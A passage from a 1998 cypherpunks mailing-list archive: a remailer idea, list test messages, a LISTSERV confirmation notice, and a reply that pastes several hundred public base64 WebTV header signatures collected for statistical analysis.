sender address, but only to the dragoncon.net  mailer software.  I
experimented with PGP and the smallest key length hoping to get signatures
down to two lines, but this was not possible.

The idea was that only a registered user could post a message using the
"Anonymous" user id.  But if there were complaints, then I could assist the
complainant in getting retribution.  In fact, it would even be possible to
send replies to "Anonymous" and the remailer would determine who to send
the message to.

I played with it for a day.  Maybe I'll pick it up again later.  Any
comments on the idea are appreciated.  I don't usually read all cypherpunk
messages, so cc'ing me if you start a new thread would be nice.





  -- Robert Costner                  Phone: (770) 512-8746
Get your free email at http://www.dragoncon.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: BMM <bmm@minder.net>
Date: Mon, 12 Oct 1998 04:55:40 +0800
To: cypherpunks@minder.net
Subject: Test: cypherpunks@minder.net
Message-ID: <Pine.LNX.3.96.981011153320.4284A-100000@waste.minder.net>
MIME-Version: 1.0
Content-Type: text/plain



Test of new DNS records.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "L-Soft list server at Emory University (1.8d)"              <LISTSERV@LISTSERV.CC.EMORY.EDU>
Date: Mon, 12 Oct 1998 07:59:50 +0800
To: cypherpunks@einstein.SSZ.COM
Subject: Command confirmation request (6329BE1B)
Message-ID: <199810112342.SAA00430@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text/plain



Your command:

                             PW REP XXXXXXXX

requires confirmation. To  confirm the execution of  your command, simply
point your browser to the following URL:

         http://listserv.cc.emory.edu/SCRIPTS/WA.EXE?OK=6329BE1B

Alternatively, if  you have no WWW  access, you can reply  to the present
message and type  "ok" (without the quotes) as the  text of your message.
Just the word "ok" - do not  retype the command. This procedure will work
with any mail  program that fully conforms to the  Internet standards for
electronic  mail. If  you receive  an error  message, try  sending a  new
message  to  LISTSERV@LISTSERV.CC.EMORY.EDU  (without using  the  "reply"
function - this is very important) and  type "ok 6329BE1B" as the text of
your message.

Finally, your  command will be  cancelled automatically if  LISTSERV does
not receive your confirmation within 48h. After that time, you must start
over and resend the command to get a new confirmation code. If you change
your mind and decide that you do  NOT want to confirm the command, simply
discard the present message and let the request expire on its own.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@replay.com>
Date: Mon, 12 Oct 1998 02:13:08 +0800
To: cypherpunks@cyberpass.net
Subject: test - ignore
Message-ID: <199810111748.TAA26223@replay.com>
MIME-Version: 1.0
Content-Type: text/plain



ping




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: phelix@vallnet.com
Date: Mon, 12 Oct 1998 06:16:56 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Hidden WebTV signatures
In-Reply-To: <199810112027.WAA06963@replay.com>
Message-ID: <36312944.569864385@news>
MIME-Version: 1.0
Content-Type: text/plain



On 11 Oct 1998 15:57:33 -0500, Anonymous <nobody@replay.com> wrote:

>
>Peter Gutmann writes:
>
>> For those of you who don't read sci.crypt, Robert Ames <gnome@istar.ca> has 
>> posted an article in which he observes that all WebTV posts contain an 
>> X-WebTV-Signature: line containing base64-encoded data.  For samples of 
>> WebTV-generated posts, try the alt.weemba newsgroup, which is filled with 
>> WebTV-user drool (caution: remember to employ protection when exposting your 
>> mind to the content of the messages).  Some samples:
>>  
>> X-WebTV-Signature: 1
>>         ETAsAhQDqtur/jfleJ2CDOnNrVoeyALEQAIUOQyCBbzjx5HHfxeMERDgCjztXOU= 
>> X-WebTV-Signature: 1
>>         ETAtAhUAmCCzQt+Tqt6fNX+L9+gDCECaqQkCFA0YCPz5tk85mUgq7iX/u4vWvOgG 
>
>Could someone grep their news spool for a few hundred of these signatures
>and post them here?  We can do statistical analysis on them and determine
>whether they all appear to be modulo the same q value.


Here ya go.  313 webtv sigs

-- Phelix



	ETAtAhQeHk0+b8Au0iGpkJrZtwhsU2MVoAIVAJR/nr45zMDoq1G526NRP+3jHVIb 
	ETAtAhUAiWMjaBJx75P5wCgIxslClcSUU4cCFHT6dVYU49dtEvX4HCI4bcmEiKBU 
	ETAsAhRLS36vm1OTCBG3CIAwMpdtg3fR1gIUdgWUE1cbbagEl7VbQvsengViPHc= 
	ETAtAhRPFKEhK84e2wMmHyKACt4Ilk3XZQIVAK5QZTG6xGW7+GXIGmu9xF7GyvSn 
	ETAtAhUAn6+qmQ+AYo9mIViQs4RDCODbJJoCFG+qrJqmg5qDjmakFC1Nawod5iA5 
	ETAtAhUAnictPulenQVgOJQjNC4u3hpnCaYCFDOD5PTlySpx4Qu2ddUdRpWhoqlE 
	ETAtAhRkO6kc7G5ww8SpfDc/9Y8trMjBgQIVAL8hrbkiiiN+IQ5lI4860ssYPpBI 
	ETAtAhQK1pwmX2vexa6PGwc3HfZ456ItvwIVAILP38f9fhupBIRPRKZTS3RiLzby 
	ETAtAhUAujZyW0eEGw8psn3AEp36f+vawlECFAcf6N5k3ozrc5Q7TXzXnn1hAdJq 
	ETAtAhUAwPBBuO6hICVNIj0Oifsyy+lno4wCFAJqdwoxzhTKc3Y2VdJksLU4FV/t 
	ETAtAhQzQv8qPo9+RKW4q4pIIyRcJMuFXAIVAMLD0isOPeOqlH8bZlxEk9942FeJ 
	ETAuAhUAqpXbl7r7FeP9IGtdSxm5fN22D6kCFQDFqfziRormhgR1PhPZUUurhWfvVQ== 
	ETAtAhUAjobFsoDyAlBzx80x1C5LOi2XahICFCzEQePKOCZTOzxB3SbzXR5jEJMC 
	ETAsAhR8oNABuZlXFw+c/lOqtdP+ieetrQIUQ8qoJtrYsT98CVvpryOhh3BQKw4= 
	ETAtAhUApm8LSet+z+W9nmdEITLJE5HT1Y0CFHcROS3ezhSxFQqwZg/q3TMjUdI4 
	ETAtAhUAhHb9lRIIU30rlSQaa+VFyNmr7ZgCFBiuj4mSW8uICieRle1LKeKudS50 
	ETAsAhRsZoT6dDawiems/788O3Zt1FEclQIUbwwmsEVcNWy1AeU3Xbq6O5NDLYo= 
	ETAsAhQBvSoylRxX+oCiPGP9zjz4q7RdOQIUOPXSOUk3+/iiHWKtu6CIaEkM6vg= 
	ETAtAhUAwUmt3gyDn4qOTmPqHaOHjfFMnBoCFFvqrdcwNQVZkuA1JQ8fzB3n3WK+ 
	ETAsAhQ8HaL+7uCTttjr1kpwh/jodI3TmwIUeDY2RxN2gB6gyWgQTOPc8gPbjvY= 
	ETAtAhUAv5DRywLaBTht37cYd95fJoF5PoICFFAwANg7T9nUNql/gHCC/LMXXX+l 
	ETAsAhR+0ji3eBSctbCQS1eYOx6uRcjMVAIUUGgGONQ7/9nvydoJneN1WZZlOhc= 
	ETAsAhQGZdSdf0MNvDO75zp7DZpO3MkBfwIUBLx7QZCwDwyY4jk4tZq1OK8N9YM= 
	ETArAhQs6Vk3FZ8xy/mc6B2wdep/COAWLwITFD3IXeD3LW44bHsZ3yVtfc8G0w== 
	ETAsAhRXMlEW4Iw7/h+I8OZI29KqH7t2hAIUWgEAuRFThZtt31xqeW3y0r65VGU= 
	ETAtAhQ0+Jijbfji8ln2iMiPqJFvc8xOswIVALiQnlZGO4NNWfXYB69Ce51loO8b 
	ETAtAhUAy54LI83+usNMOKkz/PMDpeysZOsCFGm5qVpGbeC+HP3TqpDdkI2RSREr 
	ETAtAhUAkDQwmVDrhpmrJ1fGVYxLT+ZvwjgCFGO4Q/DKaC5G9HgpxOR97L4qvaUq 
	ETAsAhQqilMPme5R51xixqRJsr7WQODb2wIUW/kQlEokMEixrynNf7L/IM05C5c= 
	ETAsAhQ0Zzj9wkJ6is9+nrg3dQW6sCZ7GgIULa0VBCAz2z4XDGWp409k0l4gxoo= 
	ETAtAhUAvy8/PKnMickBkTVO/d3DaiOsM3oCFF8L5ZUPbZXggS2okkLQrq7GxJmP 
	ETAsAhR6wAtHZIU43pQjby1z4bajv9JFMQIUTEPoJyREkpUxVCo1D+QBur8HWCI= 
	ETAsAhQkA3ZwGAb6SBi/idPf+rwuJg4x5QIUfGzlxrX/PPVptgMluscZZxeM9jU= 
	ETAtAhQTQijd3oNmTEFIIon2yKv91vsvyQIVAIhAmuifcTPFktpFKhLzM0ntxhcU 
	ETAtAhUAuCO8Cw+mJ7KDbN27E+I62psoaIMCFHuUXTbLq/j1j/4rYupshuJomRya 
	ETArAhRBWhJVOasV0A1A20nCJkJu8u2lLwITJqSvwch0mfQEClhvp5vQQ8pAGw== 
	ETAuAhUAtEkKY0D3xqGHIhZH/Xa0ZPGuLlYCFQCOGtAF9ZT3pRBceKRz4V6pLoZABA== 
	ETAsAhQzFgeoh3RUbVw1PDqn8PWtQLKEiAIUcP3njGJluNeWE8YfUQnZ7fzMuyM= 
	ETAtAhUAnukxvV3rVTTevI8i9f3L4Hu4kxECFH1+gX9LNGIUgQS/wR2gL2OCO/Gy 
	ETAsAhQlroqyoRe3Cy10DNGpoGJX1NnzFQIUfNcLR7JUZ4WP24Qxxm8vBNTOWxE= 
	ETAtAhUAgbKY3EpqRnq5ZBHVct+oGhuhJsUCFCliLMNHMjkBcC6csLRnb71xRIBU 
	ETAtAhUAkUywSArsUCkKw2jn+qqlbb9kweICFEFDEVcKdq2rf2OCHwFdYEeGPvdb 
	ETAuAhUAycTnvdbMocDVyg8n457jdNwPAkUCFQCCRT6pskZYL9YELer/28lDwEpWhQ== 
	ETAsAhQCyCyEASEsvFhSI1UnZyjIsEXswwIUK37xsGOxeZjE8XUuJlNYSaq60z0= 
	ETAtAhUAuyeGIvO7hPLZX3RkZ23WPz5pnBQCFATgTVkOtr7d5dw3dI2MuFg2Yjyg 
	ETAsAhQp1mKmV5HXCB065q9ZeIsiSncoHAIUez1bZufUUiziIJEOVBpxko8lwhg= 
	ETAtAhUApSBJ/in0OhbCkbjvQgNjbW0DaTcCFCzB387RaeGCJju9oJAXCKFZv1P8 
	ETAuAhUAuXv+9tqY0CVD5gZ9OQ2SFZh2plACFQC8/mlJxTAIAC33fGgDLHmxFnwMIQ== 
	ETAtAhQj2g60SCSUWWH+F2IyS0EGvZ1QswIVAK5YIaDRQer9EDlw++fTScCUFAFF 
	ETAsAhRSsX1uXoP3AD7gmn0cDfBeLOZwPQIUdZh5Yxd3KjAI6CZBBs6YfDzDh64= 
	ETAuAhUAgOHgS8JBGUP4si/0jzLh15ZVvGoCFQCz9Nk3OPoImBH4rVUKJ2F2vhf95g== 
	ETAsAhRTvVCgza5e2nwpJ7m92ZEacQ3ILgIUHkOaOBp8Ij2b82wRXfPMGueY3WI= 
	ETAsAhQhKr/enRcN9T+0DMJn8jUVJLAvDAIUc+gJX/L3Hnr9Gp1T0Wq3ZSJLcFw= 
	ETAsAhQwIxl6UF+LNb72GGgszRA7ZNbmCgIUICMCtgr/m48UFcb7gIFlGQO00vw= 
	ETAsAhQjkA65kdu5jlBHlIzk35jw5Y7DHQIUaXQZdb4Zz2s1Juq/M2H5egs/MYE= 
	ETAsAhQMDKryK8OJSRIPXKkulCCySRrTMgIUTKOfFlQKxotFbNZVZAOyA/YehWE= 
	ETAuAhUArhqDZyUN/gZjH6VmVftjzEgaQMkCFQCclDfi2CG3d8pqOU9CY0c3dQJg1g== 
	ETAuAhUAxvAyPvtl3+iudnG9Rmf92wgkI/0CFQDJogVpVzUE/4rJQPliDBocQE+bbQ== 
	ETAuAhUAofOrsT9qKPEBYXOAonfQ7aqGEZACFQCjSd5yKgtuK5Mn8BFhizugYiQgew== 
	ETAsAhRcj0hyx82gIOptjM5GgpLtV2jsswIUIOkt9YH+h1t62QwdbEvfLaB2Rdc= 
	ETAtAhUAq/XR7wsBjaSxsg8eb7A+uHXdvacCFE+p9l1c/5g5TP8OLzIFMltdBUZ7 
	ETAtAhRzRrANeu8O0Hfj+q+lP7Neh/7pyQIVAJ/dv3B+uqx7LPKLvqlAcV8U/avN 
	ETAuAhUAgJD+C+jLNEETkDLuFkOz5B+FnykCFQCBBpin/gx4S6CuxEEpNoMeREIiiA== 
	ETAtAhUAoPmrDvDMNlvbJjAFvMgl5+rQcqQCFFbZh4ziZK8ktg8Lfdjvy/w2ns8A 
	ETAtAhUAwJ8XVenz71M4WcI3PHFFWisQhqsCFCBc9groCubgB+J1ya3UZIyelRRI 
	ETAsAhQIfk7OjQOzOjwx4k01PS2R2n/fDQIUaWgpP45BiWYDobdqBfZAACw78/A= 
	ETAsAhQN4JWKwofxj23Q1TCO4b5XEVh3XAIUEDsmYUun6A3LRS7UhBo2XtEc/Wo= 
	ETAtAhUAkYXyom09QZ3u/SmeV1cr3c+H6AgCFGyy0eH6C8et6+khI3fzHZ7zAE3I 
	ETAtAhUAysHLGMPSDKQA2zoUWBKL6j9pbt8CFFBjwAkImliNL11O7sPSk6YU9rky 
	ETAtAhQJumDJ6gjeDueb+BVjIXjcIZW9QwIVAIG5iD8KiBlK8P587t4h6/yck3El 
	ETAtAhUAlB3AVdzu5vpN2uI2oIj6IrzLR6QCFHvZvy33w67WLHlFmPqyG6wDU7lb 
	ETAtAhUAtIyoc42UsajnqfC2L8mBeTJcmB0CFDxJ0ugTI+HVozFKh9JiG+5/TYsz 
	ETAtAhR6w4Oy2VaRNSrw04U5h+/osuIAIAIVAJYUmg9YzRJSu9EX4i5yERo3kdHZ 
	ETAsAhQwsNBpOYmtHhQc4W/UKPLT/YcqAQIUFSvekcKn0XGhMZj6reDidAxjj3U= 
	ETAtAhUAvW3kboabjmnhUty1ejxJvKD4HY8CFG4Rv3uVG/Q2R1Pt+02+NlMcFR1d 
	ETAtAhUAj3hge4loT9bWecqlMjXYmNSZeAUCFDD5CYYIedCXmWspicPr2S4gMv5b 
	ETAuAhUAgdDLLWRXQeRAEBCYZSYyUZXpT1UCFQCDpmxm5yKA7BkdkfjyYusQQeQwgg== 
	ETAtAhUAk8cO++8JZy1r32zAJVuyj307zEcCFEYzRntm0134uUySWJQrDwOdtZmP 
	ETAtAhUAr2bKMuDoD1GiGIhvXLRExLkcL3ECFFakZssdOptMkvwqBy/daYfwq4YO 
	ETAsAhRFbDek+wROhSNn5SHw0UBaWtwl2wIUTMHH+7XJVTPeJ3xHj/lZm84THVQ= 
	ETAtAhQGoQavXBaZTuW4zLGyp/e4KmFvswIVAJQ1JXKu4O9xCpT0k0yZK7RvmOI+ 
	ETAtAhUAp5tH7aLLsYjpTiY0j/aB8oQCNtsCFBFR0JPJFkXAWYBrIdp/OayxVRoL 
	ETAtAhRs+ECGcKAbo3VMDrFewzJF7OT0SwIVAKqqyCIdoTjvhU5XgfMCXQMxlz2N 
	ETAtAhUAhCQAoqBFNXfU4Wijw8TdWCmr4wECFDgsvxaLzIvngsVBxmVKXx+zIMKg 
	ETAsAhRvE5eMpSvrzcwo5Gr6L/S4EN81XwIUDMAycGBeYeELAB3WYvfHnjgHEBQ= 
	ETAsAhRvkxLPB26683CylraHakbDUJSZHQIURPbc45ET/4SBAfLfYwY6bn1fIrM= 
	ETAsAhRLITYHnVfD6a3lztzcI6h0X72LjgIUVET5oBjtlmgAVQPTFc11ZZuY0mU= 
	ETAsAhRIzKpkEMilLQtJi+ZbqspsinC62gIUJDKLOme36a+8wnFk77NckteYaB0= 
	ETAtAhQ1Z4DDDg6ZOpMfmpI6DhvNqEgbAAIVAIouWDxjRAAu3pRm/Mf+Ak/A/kNF 
	ETAsAhRgeq2jnTeyoiCdUkkqPK7o2pknLQIUDxsVJ4hRl8kSpJpI47txx9kfIkg= 
	ETAtAhR9zxD7Yi2X9lcLhDMRhDmQFQ5aVQIVAMS/iicusK0ws90gj+erFRdDGQHo 
	ETAtAhUApicy3P8GaBXR4hXTCCWb727B8nECFGLfqYB6b/2dnKJfqSNafvINScPc 
	ETAuAhUAt5AuH6NDL3ucVAI7eW6801nwGDACFQCoGWBqCteGf778iWvHlF9q+ZEEpQ== 
	ETAtAhUAvD8YPYoG49wx/isduMjN3S9Y5/cCFB75/wla8b83l5A567UuWpRw+Z5U 
	ETAsAhQKe8lOBzr2J+B1h93bAmF9tMaGXgIUTO+UIjTiJ7kB2ZELVX6DUIHpexs= 
	ETAsAhR4R36NOtkBC5NIRA1DRF354juLhQIUG/gEgTIB1gFQTinVjnI9A4HzSQE= 
	ETAtAhR7AFlqigoJFYD5SAdT+U4aYd9TBAIVAMd3Ofhg4dCGM+UQBx+2o9nlPw1R 
	ETAuAhUAv3Ky4WNvxsHfAGRRGMMZ9/3PBkkCFQCs6ge9tB+UKPMLIC6TbxmVxafknw== 
	ETAtAhUAjqlFEglvlQ06U5zhnC4t02PJgZcCFBJIXK5ZIgytKZi1yQvMzm3S1B76 
	ETAuAhUAtsmiLfXWXHc5Mk/rO0qoHFJOkWMCFQDDHkMCdTWL997znVbK42x/gA9FHw== 
	ETAsAhR+TIlG5jFEV00jOEuHUAhAIFNwAAIUBO+3RWL8uVsRhvKkfiV5Juh+XTM= 
	ETAuAhUAmJuiqHFajSGuQiDET9UVlBbtfjMCFQCZOwCDF/eVL1DhRX/pN24il6BKEw== 
	ETAuAhUAxDYBQL6xyZ02c21Y9RN5iu7yXrYCFQCdWV71LI999igld1UVaNTD5iBftw== 
	ETAtAhUAjyGwRgoScKu6BAzRY2zg04ICi08CFFgv6Yi7+TCSlgnBfdW1zdWfJOuL 
	ETAuAhUAm63QEE+IqVQfqXha/o4RDZsvYU8CFQCiuhzNmdVh9lju/YmrZJczICQv1A== 
	ETAtAhQzYt9e72GevGQmY/ETkAoKuDJovgIVALvyAVu6KcLEwzgK5eKU01Fi/gd0 
	ETAtAhQQ437FFbqAcuN0HcGuWtqpHg9UAAIVALCKy8xHGJCneqaQ7c4qnB/EP2Bm 
	ETAsAhQAr7vGYwpUdpqgl+eSzS0fDQvyZwIURkdnEGm8eK22XuEhmwLnyXe/iMY= 
	ETAsAhQ62Nxao3jlXYnqnsrYnbSPxIBpcwIUH2Oo3PQTMG6LPee0iQOcIDkw2tY= 
	ETAsAhQJtm05Gd+58mdF8nNqLWf5PP6m6QIUaoekh3+5zI42rvZaKiB/QwTgkQA= 
	ETAsAhQEXH5eHExs8/mYGcvdyRlgGuKBbQIUfDBnDZwU057FnAppJ529NzewQso= 
	ETAtAhRWSqFeRdfozaeh96MoWYibAWmjygIVAKQ7O8JKIadjeB3RtFxpD0ST062L 
	ETAtAhQo4aCMjUqH/4NejVIczwpG/SnsxgIVAJpwErFyKKTBKFlD/wEbPC1qnTZy 
	ETAsAhRqDCDXz3ROVA6UU5635T/zXDstKwIUCnyAqUjrtPZPFe2Ode7qhknU0Ns= 
	ETAtAhUAyIag46CHSEoG6lmUTt1kzjy+aVQCFGOvYugkt1IT+pD4RhK9rT7SvTiG 
	ETAtAhQdN2VyVJRUX/OpjXgpmX+xg7UEAAIVAI8HkB9X47D1rvxVQzC7nU3XuDsF 
	ETAtAhUAkGf27c0dvRWK9KRAFzRYDzIrkgkCFGAukRiOHe9Gs+/wzIupnhSkqN38 
	ETAsAhQmHznAIKFlzT9YJ7yHCSq8G2v++gIUMj0YZAAyJmp4ZphT4du78+pxxTQ= 
	ETAsAhRKupvhrK54jQFgyfwJ5wJ01TVp+gIUcCjOk5yrzrqYPjIPex4tSzYvyW8= 
	ETAtAhRaDIcUhPO0QJVymwBR9B04rSm+uAIVAJXmkufVLpf2xpSq2xU1y+bX1BZX 
	ETAtAhUAmoX/3Jq+K1dvdr4BFw+IJaoYXgUCFG32PfUf+enPmZsUdJjJxAGTLaHg 
	ETAtAhUAy6ir+ozc+np/keNWOz1/okURq2wCFElrN1Ok/6c+hS5VIOGMVeqmaqvm 
	ETAsAhR/TL+3ohpEnDLH3eJQMIB8h5a+NAIULFuiDpaJGv4NSU6V7RGOGzuEd8U= 
	ETAtAhQn+1R8M6pfIst3JXAk5Izj5N82KwIVAKM+iy2nHY1jopVswbEh7WHP2Vm1 
	ETAtAhR9VPu6S4Vnk7TmoxohlBWxiNo1cQIVAMFA844GD3YVJ7Arc2PS2fd0h3eV 
	ETAsAhRjiszmXhkKg9502LNwfmt0mS9cxAIUIUCgjiJ1FZrIU3WMMq25de+zN28= 
	ETAtAhUAitHnCcPhbXnVVCd2fzuYOWGa+UoCFFnyi+hp++XipM3fIWcO9P+qWEMx 
	ETAtAhUAhurREyBqW9VF5ykHjE0n+YbR2O8CFAoPje0cZITuzo6ttp+llUqH453H 
	ETAtAhQlEiN8wlOYC6dDKTLYfuvRUT7UjgIVAK4k16Z/Pz3obJjcM0AhXQn1OvvQ 
	ETAuAhUAtqyqp4dy8Q7d9rSC3ZN0blaPpPkCFQCShe129qI6NMlsxwhPB8dmhsWR3Q== 
	ETAtAhUAhm1TOOinajFZjW4SdF8EOe1NhzkCFDZFSC0iBSgSJgiqgc0jmXXBOkqy 
	ETAtAhUAt4hpnUEhZsxIvBr+0B+Yz0NZeEoCFAg4dSKOA+FqYl4UWZ728wwiUx67 
	ETAsAhReBwmVtOJ8XQuGr3kk9RsJP+4N5QIUDcEOpZPXde4K1RcVY4coMGbnUsA= 
	ETAtAhQSn7bQNB1U9LdNiQrDw6jQR3GEtgIVAL2JYZe1QPn8SKED7dEpjzf1+KQu 
	ETAsAhQ52g6I9NAjoL0W/vYyQrl3nGlvOgIUG963Y9liZTvB2u8XlGiRkyy64Xc= 
	ETAsAhRKw6mIP/azvTuasOQmlFEsnLiUJAIUZyYQ5UMLR+kt5HrWEZ2wGP0hOs0= 
	ETAtAhUAvWiD6UaXIt9qrtRnDwNriKMi9o4CFHSv+nq6fNIRhTAzaygMOltY41Vc 
	ETAtAhUApWxZlwHTwshbGCw15GAQ/T38lIkCFEJ4z4SRWzYu/xebe6RlwOJUmZKg 
	ETAuAhUAsfv94xNvbUI8elp11oQ6BySsPaMCFQCtlgO44ZPVa8xgGHjfdDQmr6/YoA== 
	ETAtAhUAyOYNI7+gTJ7/1MDrA/IgP/sufJgCFAkcBx2AUQ9dxlDXzj638eeuoC0J 
	ETAsAhRmVZrY8lzCqWS3lEf9DqfZc9X1VAIUPJsGbcBogMsBymwYyUj8zffOJXo= 
	ETAsAhQY42qDPZMSgnevP9UZUcQ0eI/PHgIUL4Wf8OPEKktJ63kX+khpK9UtOD8= 
	ETAtAhUAuCjJN13+LuTVa1JPlb8zxVxdCsgCFHs5b9TltWERAwOunzsK3lZQyEgN 
	ETAsAhRoQNMMD2/xBPzg+tK4IIumauQS2QIUB2eLNiFpDI3cxbYCKTCtRJ20bLE= 
	ETAtAhUAkRtHGuLuCR55XQvpDJpBdpH4ig0CFCtjk2J14l0GreGiuSn7t8AublVw 
	ETAtAhUAiqF3yN45jgfBNZw6dENZNnJzEKACFD9vve5oqtwvXjrFY5UPEV1ssh79 
	ETAsAhQ6c7u6zYORRsEcEuAsATvmF5vZ+wIUTsuHueTtaBWRtIzauaHqJ6R8oc4= 
	ETAtAhUAv+yS6ButjH920KIefR/aCEothQoCFHTK5/lZ28F02CT3FQUeOatuypyF 
	ETAtAhRW9RnK0G9J0AXmEOcllgypEGFi2wIVAMKs5oXfbM4QoIJhjj3ZvF8UazF8 
	ETAsAhQtZJEJB67l8p6wXx7xoB/wjxt6IwIUepp7tdaDmbl5SHW3ewPsWTsoBgA= 
	ETAtAhQJDSVuVm+gtYwUX8we/rk4mWpDbgIVALfiTWH+icbvzClfhzc20EaGUl59 
	ETAtAhUAkUt5tJuo5hbGQi/C1GKpPaoffK4CFEX+E+TSLH3CLxFczYb3qN0XNERv 
	ETAsAhQrX8z0FfakewuuyQDfT7SK/Vmr4gIUVPNwOF26XfBsWl/Hu4w0haObyKY= 
	ETAtAhUAmStVSJZ3e8qxt3M4QLw4Dto4wEACFHAzZR+yBk3useh/giLZHOmF3ilR 
	ETAuAhUAw/vxNPSIzpCKbHFAW8fEjnRBDu8CFQCYgC4xmbuoBYt9JEImr+u1RVCOSQ== 
	ETAtAhQ/+Dym2Q56B5Oa0bYrKKavftQztAIVAKkeOj2DceMbyMHFLlwoVHpZI+gZ 
	ETAsAhQVUf9KyQ6r0j08g86u5QBS1bKxDQIUNvdZZF9Cf4833g2HxshuGT6zH+U= 
	ETAtAhQmuS2ELdJsMjM383Eiic7ufYxPzAIVAMPDb4Qg0WIgXzy0KwQaYBFoPHwO 
	ETAsAhRLgDTH9lOH6Buy/3uBKT7X1RwGGAIUYhwe8Uqw9ZX07Z3OL6cdIUnMzjU= 
	ETAtAhRXuM959ZsT3geGcOQrkCze2GyLrgIVALtmxL/HoBgbHNUqrmfoksfIfwu7 
	ETAtAhUAygdWDBcXAX6TUNR4OqdSB8jegzMCFBOQcn4KXBJC+MtqxYACg88AnfOq 
	ETAsAhQMdvSA3kHmEmuVsb+wuRtsiPym+wIUVfp8GyjUnnHsnu3Txaa8dDAwjDA= 
	ETAtAhUAn64OjFbXnOVZO0PXHrceTp/yb6sCFH3AId5TKzyBZMshCk0eGZwuRH0W 
	ETAtAhQalIUSE1dgh4fIf7h8+I/5CyiBXwIVAK1ZqJp2xCAScZ08ZWLFN7GL7gTy 
	ETAuAhUAuPJ9BDkSxKcXVn/yI/DCmQ8KrQ4CFQDNU/tbx2mXMLOdQrmXgv7P3+UqWg== 
	ETAuAhUAhLIN9O+o4H7Qst9famP+f4ZqmGYCFQCMXzu2N/GOiUBKTpXfMVpODmOokg== 
	ETAsAhR3wrluC/P6vxxYf8XNMUznEyiC4gIUfO8bPz6zouCgs5E6oopjWzSqmmY= 
	ETAsAhQ7PmBESPA6fhgzNl3SZ7aomDP6mwIUOrIJjesC1UX3gw2GeaxdF+2R2XU= 
	ETAsAhRLnjbVBP7Q4eJimlaoq0mfAGBlkgIUceuCjutTtQrZfqwEB68QqFOgL8o= 
	ETAuAhUAwFKb4OUKlAAdr+CPsX0ZxABCgr4CFQCuEx6EsSkRvhJeoR5gpkgQnUTo5Q== 
	ETAtAhUAomCqVF7fnyZNSCCJ0J0Hb0/mhtACFCLC8IfdLKs9i0AWFswBB6dAa++N 
	ETAsAhRDmA1c5vOqLLuP+GJrvm6e69wQTwIUWYdBfOq6HtJbh1H+X7O+Va0/SU4= 
	ETAsAhRbvTmI+nKdw/5XESC4OSkxlJ0ARAIUWUgUXeZKuPHbsn8jFEeIi19Edls= 
	ETAuAhUAsiTOoBUIypKXf95OE5zT+NLBAKkCFQCuFs23ZZsbLPhIp+0r5Y1M1W1q7Q== 
	ETAsAhRgTvXshEDiiZ++EUiuZoHJ1iJapgIUZVHEGgm9wc6iHReLIulqSzGhXXs= 
	ETAtAhUArKWtLvL36701yAoKUMiEW0bGHdMCFHNHSEzz+Fhs/BIRXYZnHf/TrN5J 
	ETAtAhUAvyDshPWnBzs1TmajJoihCCvHEYECFBWmc99mWVX4VYqI7slxG1n5OPqi 
	ETAsAhRNvWCiSR0/0NZKxoPJQW9CNC6zewIUB1/A3cgMF/hPCINVn4pe4CoDtpY= 
	ETAtAhUAkbO+vNDHqJrKgoxFcBxSS+FZ4dQCFAdvidhHRPLyQVPpfCzkHD6Zu4aB 
	ETAsAhRKdvhxiQjfvCFNcQBBNZsHK7FtDwIUNeAz3+H/CtmiyecoaD6yOqBFw7M= 
	ETAsAhQQ3PaXZSfqw3t4iu84JbOXuPsO8wIUEWwF/NH/3qKXvfWs2ALFiSMX47I= 
	ETAtAhUAioqq87sm9WZ2oSOj2klkxztDKbACFHE7UmYPx/AkRif/DnPzhK4zHbny 
	ETAuAhUAopBjhKF68JCn6e/TXl/aC8spx4MCFQCPab4MMY83visbJf9/bNaCkOGB9g== 
	ETAtAhUAkXpcujjWWSB9ZUXEYSUVjJnx4hwCFE+BXeak/i8OcH3K0Qnvxa4RrAG2 
	ETAtAhUAi4urDR3KLp5qqW743VDM3j7+NxMCFCJTFkXB1YFnlLWR8uO9fPnM3oEn 
	ETAsAhQsiGU2wDd7wh2MqVNqbevQYzeeKAIUAKRb4iTrg1Q1XokfJXzo6pmroIQ= 
	ETAsAhRD4+UJ8lTdUooE0vxHP0MWlzKktQIUEIh/TlS0Rch3IrjcMifZyciCMbQ= 
	ETAsAhREXH9h+VwME+H+TKOLGTdFULaJhQIUUE1qQokVuE7WRszF/P+z0MEEWIE= 
	ETAtAhUApqvYS1eU8qsF4+4W7N6ligN+6qYCFHcjojm4uVbm6OHCip2HK31qZ8P0 
	ETAuAhUAo8o6TRgJtySc0jS2R7abjbqmPqECFQCojIkBfa7TpGxkDEV1ta6Trd0oRQ== 
	ETAtAhUAuNiv0AZeRUxKljVNig2voI/805ICFCClHmBhmLVeJte+m5jBP/GrR9kD 
	ETAsAhQhuKITlYWrL51zDlrrl5O0Iuj0QAIUOczJiadrzOw2m4UqY9mS5yFFWvY= 
	ETAtAhUAqX1qKSpVoj4Ey921AsR0texw9aYCFH5P/VdYhiyp5eNFfm49aiJ8GcmQ 
	ETAsAhRtw/sbN+3E90SIrA43X/sxlEY5agIUEtwZtPOVo/GR86iG8ivdHcPNCIE= 
	ETAuAhUAiICMJQ0WbljZz7idsPhMkJcDibUCFQCG4SbRG87TrOFNijU0yU+nkb6vRA== 
	ETAsAhR11Ud8owlc1vGYlFpWWyYz3ltbiwIUM7RtsJXywMAmkF7y4TZ++lQ7Qqc= 
	ETAsAhRbtx5Xf1H4XxcocBh74GpMM0JL2AIUK7p1v2mFSMWE3R0RDMv6KW+O044= 
	ETAtAhQCLb9gSimCpHvm70zSvWwi1qATaQIVALpnf7ijyDtCjNch9G/TqxIVUvcp 
	ETAsAhQpo1neQ/HWpF/HTO7JFbLwjn8RggIUMdqLkhJmw/2HTpK8kEVFHQfeMyQ= 
	ETAsAhRcN2dSYL/LrR3LzPT6xrahief3tQIUfWHiqI6jKzGCQ/IueCIFdsCsGOU= 
	ETAsAhQYQLLDUweXhin4PEXpXWnqlfaU6gIUVU68RycyFzmTnNq2qA5LHz0Gc7k= 
	ETAuAhUAk9GFGVCw62J6g+RTQKg2x7Raa4kCFQCiFFLMwgIYfKeQICOpuUCQ82LNkQ== 
